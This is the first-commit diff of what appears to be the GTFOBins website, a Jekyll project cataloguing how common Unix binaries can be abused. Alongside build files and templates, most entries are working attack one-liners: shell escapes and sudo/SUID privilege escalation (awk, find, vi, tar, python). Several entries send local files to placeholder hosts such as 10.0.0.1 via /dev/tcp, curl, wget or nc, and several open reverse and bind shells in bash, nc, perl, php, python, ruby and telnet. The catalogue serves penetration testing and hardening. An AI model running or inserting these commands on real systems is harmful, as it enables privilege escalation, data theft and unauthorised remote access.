First commit
commit
b81e57005a
|
@ -0,0 +1,3 @@
|
|||
/_tmp/
|
||||
/.sass-cache/
|
||||
/_site/
|
|
@ -0,0 +1,3 @@
|
|||
# Contributing
|
||||
|
||||
TODO link to website URL
|
|
@ -0,0 +1,63 @@
|
|||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
addressable (2.5.2)
|
||||
public_suffix (>= 2.0.2, < 4.0)
|
||||
colorator (1.1.0)
|
||||
concurrent-ruby (1.0.5)
|
||||
em-websocket (0.5.1)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
eventmachine (1.2.7)
|
||||
ffi (1.9.23)
|
||||
forwardable-extended (2.6.0)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.1)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-watch (2.0.0)
|
||||
listen (~> 3.0)
|
||||
kramdown (1.16.2)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
mercenary (0.3.6)
|
||||
pathutil (0.16.1)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.0.2)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.9.10)
|
||||
ffi (>= 0.5.0, < 2)
|
||||
rouge (3.1.1)
|
||||
ruby_dep (1.5.0)
|
||||
safe_yaml (1.0.4)
|
||||
sass (3.5.6)
|
||||
sass-listen (~> 4.0.0)
|
||||
sass-listen (4.0.0)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
jekyll
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.1
|
|
@ -0,0 +1,10 @@
|
|||
.PHONY: serve bundle
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
|
||||
serve-public:
|
||||
bundle exec jekyll serve --host 0.0.0.0
|
||||
|
||||
bundle:
|
||||
bundle install
|
|
@ -0,0 +1,15 @@
|
|||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
||||
permalink: pretty
|
||||
|
||||
collections:
|
||||
gtfobins:
|
||||
output: true
|
||||
|
||||
defaults:
|
||||
- scope:
|
||||
path: '_gtfobins'
|
||||
values:
|
||||
layout: bin
|
|
@ -0,0 +1,39 @@
|
|||
exec-interactive:
|
||||
label: Interactive
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
label: SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
|
||||
|
||||
suid-limited:
|
||||
label: Limited SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
|
||||
|
||||
sudo-enabled:
|
||||
label: Sudo
|
||||
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
|
||||
|
||||
download:
|
||||
label: Download
|
||||
description: It can download remote files.
|
||||
|
||||
upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
---
|
|
@ -0,0 +1,40 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
suid-enabled:
|
||||
- code: ./bash -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
||||
- description: Send local file using a TCP connection.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
cat $LFILE > /dev/tcp/$RHOST/$RPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
||||
- description: Fetch remote file using a TCP connection.
|
||||
code: |-
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request.
|
||||
code: |
|
||||
URL=http://10.0.0.1/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
curl $URL -o $LFILE
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./ed
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
---
|
|
@ -0,0 +1,23 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
---
|
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,10 @@
|
|||
---
|
||||
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,18 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./less /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./man man
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,25 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Serve a file on a TCP port.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port.
|
||||
code: |-
|
||||
LPORT=8000
|
||||
LFILE=file_to_get
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
- code: |
|
||||
LPORT=8000
|
||||
nc -lp $LPORT -e /bin/sh
|
||||
---
|
|
@ -0,0 +1,14 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=12346
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
---
|
|
@ -0,0 +1,39 @@
|
|||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'passthru($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'print(shell_exec($_ENV["CMD"]));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
---
|
|
@ -0,0 +1,32 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
|
@ -0,0 +1,32 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
|
@ -0,0 +1,19 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=8000
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
---
|
|
@ -0,0 +1,36 @@
|
|||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/where_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,20 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=where_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,10 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
|
||||
-p"
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
---
|
|
@ -0,0 +1,34 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
suid-limited:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
|
@ -0,0 +1,13 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
wget $URL -O $LFILE
|
||||
---
|
|
@ -0,0 +1,11 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
---
|
|
@ -0,0 +1,57 @@
|
|||
<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
|
||||
|
||||
<div id="bin-table-wrapper">
|
||||
<table id="bin-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Binary</th>
|
||||
<th>Functions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
{% for file in site.gtfobins %}
|
||||
<tr>
|
||||
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
|
||||
<td>{% include function_list.html bin=file %}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</tbody>
|
||||
<tfoot>
|
||||
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
|
||||
</tfoot>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
var searchBox = document.querySelector('#bin-search');
|
||||
var searchMessage = document.querySelector('#search-message');
|
||||
searchMessage.style.display = 'none';
|
||||
|
||||
// ensure height during filtering
|
||||
var binTableWrapper = document.querySelector('#bin-table-wrapper');
|
||||
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
|
||||
|
||||
searchBox.addEventListener('input', function () {
|
||||
var query = searchBox.value.toLowerCase().trim();
|
||||
var noResults = true;
|
||||
|
||||
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
|
||||
var binName = row.firstElementChild.firstElementChild.innerText;
|
||||
if (binName.indexOf(query) !== -1) {
|
||||
row.style.display = '';
|
||||
noResults = false;
|
||||
} else {
|
||||
row.style.display = 'none';
|
||||
}
|
||||
});
|
||||
|
||||
searchMessage.style.display = noResults ? '' : 'none';
|
||||
});
|
||||
|
||||
addEventListener('keydown', function (event) {
|
||||
if (event.key.toLowerCase().match(/^[a-z]$/)) {
|
||||
searchBox.focus();
|
||||
}
|
||||
});
|
||||
|
||||
</script>
|
|
@ -0,0 +1,6 @@
|
|||
<ul class="function-list">
|
||||
{% for function in include.bin.functions %}
|
||||
{% assign type = function[0] %}
|
||||
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
|
||||
{% endfor %}
|
||||
</ul>
|
|
@ -0,0 +1,7 @@
|
|||
<dl>
|
||||
{% for function_pair in site.data.functions %}
|
||||
{% assign function = function_pair[1] %}
|
||||
<dt class="function-name">{{ function.label }}</dt>
|
||||
<dd>{{ function.description | markdownify }}</dd>
|
||||
{% endfor %}
|
||||
</dl>
|
|
@ -0,0 +1 @@
|
|||
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}
|
|
@ -0,0 +1,6 @@
|
|||
<h1>
|
||||
{% if page.url != '/' %}
|
||||
<a href="/">..</a> /
|
||||
{% endif %}
|
||||
{{ include.title }}
|
||||
</h1>
|
|
@ -0,0 +1,46 @@
|
|||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
|
||||
|
||||
{% include page_title.html title=bin_name %}
|
||||
|
||||
{% include function_list.html bin=page %}
|
||||
|
||||
{{ page.description | markdownify }}
|
||||
|
||||
{% for function in page.functions %}
|
||||
|
||||
